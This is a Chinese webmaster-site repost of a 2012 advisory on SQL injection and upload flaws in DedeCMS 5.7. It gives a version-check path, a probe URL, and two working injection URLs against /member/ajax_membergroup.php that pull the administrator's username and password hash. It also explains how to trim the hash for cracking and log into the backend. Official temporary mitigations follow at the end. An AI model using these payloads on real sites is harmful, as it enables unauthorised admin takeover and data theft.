星联网络专注帝国CMS二次功能插件开发-精品网站模板站长代码素材

  • 最近更新
  • 模板:33
  • 记录:12641|
  • 插件:52|
  • 工具:4|
  • 代码:8|
  • 评论:0

dedecms5.7最新注入和上传漏洞(2012.4.26)

前言

本文主要讲解《dedecms5.7最新注入和上传漏洞(2012.4.26)》的详细内容

发布时间:2012-4.26
漏洞类型:注入漏洞、上传漏洞
获取dedecms版本升级时间:“/data/admin/ver.txt”页面获取系统最后升级时间。

然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如下图说明该版本存在漏洞。


/member/ajax_membergroup.php?action=post&membergroup=@`'` Union select userid from `%23@__admin` where 1 or id=@`'` 查看id为1(管理员)的用户名。



/member/ajax_membergroup.php?action=post&membergroup=@`'` Union select pwd from `%23@__admin` where 1 or id=@`'` 查看id为1(管理员)的密码


得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5。
至此得到管理员用户名为admin和密码的md5,解密md5即可以管理员权限登录后台。

官方临时解决方法:

方案一、临时补丁
方案二、以网站管理员身份后台禁用会员功能:系统 -> 系统基本参数 -> 会员设置 -> 是否开启会员功能 改为(否)
方案三、可考虑直接重命名或删除存在漏洞的文件 /member/ajax_membergroup.php,最暴力却最有效的方式。

临时补丁:暂无


本网刊登的文章均仅代表作者个人观点,并不代表本网立场。文中的论述和观点,敬请读者注意判断。

本文地址:http://www.xlkjgs.com/notes/web/5481.html

以上内容由本站整理呈现,请务必在转载分享时注明本文地址!如对内容有疑问,请联系我们,谢谢!

星联网络

星联网络是中国最具实战的互联网创业者的知识服务商,这里有互联网行业动态,网络推广,SEO优化,SEM优化,ESC配置,行业经验分型,互联网项目,微信营销、淘宝客赚钱、新媒体营销、京东运营、跨境电商等众多互联网营销知识分享

站长运营站长必备网站运营之道才能长久发展